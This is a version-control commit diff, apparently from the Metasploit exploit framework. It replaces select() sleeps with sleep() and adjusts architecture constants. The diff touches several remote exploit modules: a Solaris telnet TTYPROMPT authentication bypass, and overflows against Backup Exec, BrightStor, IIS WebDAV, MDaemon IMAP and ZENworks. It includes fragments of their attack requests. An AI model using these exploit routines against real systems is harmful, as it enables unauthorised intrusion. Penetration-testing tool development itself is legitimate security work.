No more select(nil, nil, nil, X)
git-svn-id: file:///home/svn/incoming/trunk@3259 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
c8d273cec0
commit
3fa5d999a2
|
@ -75,7 +75,6 @@ ARCH_TYPES =
|
||||||
ARCH_PPC,
|
ARCH_PPC,
|
||||||
ARCH_SPARC
|
ARCH_SPARC
|
||||||
]
|
]
|
||||||
ARCH_ALL = ARCH_TYPES
|
|
||||||
|
|
||||||
|
|
||||||
ARCH_CMD_UNIX = 'cmd_unix'
|
ARCH_CMD_UNIX = 'cmd_unix'
|
||||||
|
@ -87,3 +86,5 @@ ARCH_CMD =
|
||||||
ARCH_CMD_LINUX,
|
ARCH_CMD_LINUX,
|
||||||
ARCH_CMD_BSD
|
ARCH_CMD_BSD
|
||||||
]
|
]
|
||||||
|
|
||||||
|
ARCH_ALL = ARCH_TYPES + ARCH_CMD
|
||||||
|
|
|
@ -29,6 +29,8 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
||||||
{
|
{
|
||||||
'Space' => 2000,
|
'Space' => 2000,
|
||||||
'BadChars' => "",
|
'BadChars' => "",
|
||||||
|
'MinNops' => 0,
|
||||||
|
'MaxNops' => 0,
|
||||||
},
|
},
|
||||||
'PayloadCompat' =>
|
'PayloadCompat' =>
|
||||||
{
|
{
|
||||||
|
@ -51,6 +53,9 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
|
banner = sock.get_once
|
||||||
|
|
||||||
|
p banner
|
||||||
print_status("Setting TTYPROMPT...")
|
print_status("Setting TTYPROMPT...")
|
||||||
|
|
||||||
req =
|
req =
|
||||||
|
@ -69,10 +74,12 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
||||||
"\xff\xf0"
|
"\xff\xf0"
|
||||||
|
|
||||||
sock.put(req)
|
sock.put(req)
|
||||||
|
sleep(0.25)
|
||||||
|
|
||||||
print_status("Sending username with 65 environment variables...")
|
print_status("Sending username with 65 environment variables...")
|
||||||
sock.put(datastore['USER'] + (" M" * 65) + "\n")
|
sock.put(datastore['USER'] + (" M" * 65) + "\n")
|
||||||
sock.put(payload.encoded)
|
sock.put(payload.encoded)
|
||||||
|
sleep(0.25)
|
||||||
|
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
|
|
|
@ -100,7 +100,7 @@ class Exploits::Windows::Backupexec::BackupExecNSOverflow < Msf::Exploit::Remote
|
||||||
sock.put(payload.encoded)
|
sock.put(payload.encoded)
|
||||||
|
|
||||||
print_status("Waiting for the payload to execute...")
|
print_status("Waiting for the payload to execute...")
|
||||||
select(nil, nil, nil, 2)
|
sleep(2)
|
||||||
|
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
|
|
|
@ -110,7 +110,7 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp
|
||||||
disconnect
|
disconnect
|
||||||
|
|
||||||
# Give the process time to recover from each exception
|
# Give the process time to recover from each exception
|
||||||
select(nil, nil, nil, 0.1);
|
sleep(0.1);
|
||||||
}
|
}
|
||||||
|
|
||||||
handler
|
handler
|
||||||
|
|
|
@ -140,7 +140,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
1.upto(8) { |i|
|
1.upto(8) { |i|
|
||||||
select(nil, nil, nil, 0.25)
|
sleep(0.25)
|
||||||
return if self.session_created?
|
return if self.session_created?
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -155,7 +155,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
||||||
connect
|
connect
|
||||||
rescue => e
|
rescue => e
|
||||||
print_status("Connection failed (#{i.to_s}/20)...")
|
print_status("Connection failed (#{i.to_s}/20)...")
|
||||||
select(nil, nil, nil, 2)
|
sleep(2)
|
||||||
next
|
next
|
||||||
end
|
end
|
||||||
return sock
|
return sock
|
||||||
|
|
|
@ -67,7 +67,7 @@ class Exploits::Windows::Imap::MDaemonImapCramMD5Overflow < Msf::Exploit::Remote
|
||||||
res = sock.get_once
|
res = sock.get_once
|
||||||
|
|
||||||
print_status("Received LOGOUT reply: #{res.chomp}")
|
print_status("Received LOGOUT reply: #{res.chomp}")
|
||||||
select(nil, nil, nil, 1)
|
sleep(1)
|
||||||
|
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
|
|
|
@ -83,7 +83,7 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
|
||||||
"0\r\n"
|
"0\r\n"
|
||||||
|
|
||||||
s.put(req)
|
s.put(req)
|
||||||
select(nil, nil, nil, 1)
|
sleep(1)
|
||||||
|
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
|
|
|
@ -73,7 +73,7 @@ class Exploits::Windows::Novell::ZenworksDesktopAgentOverflow < Msf::Exploit::Re
|
||||||
sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))
|
sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))
|
||||||
|
|
||||||
print_status("Overflow request sent, sleeping for four seconds")
|
print_status("Overflow request sent, sleeping for four seconds")
|
||||||
select(nil, nil, nil, 4)
|
sleep(4)
|
||||||
|
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
|
|
Loading…
Reference in New Issue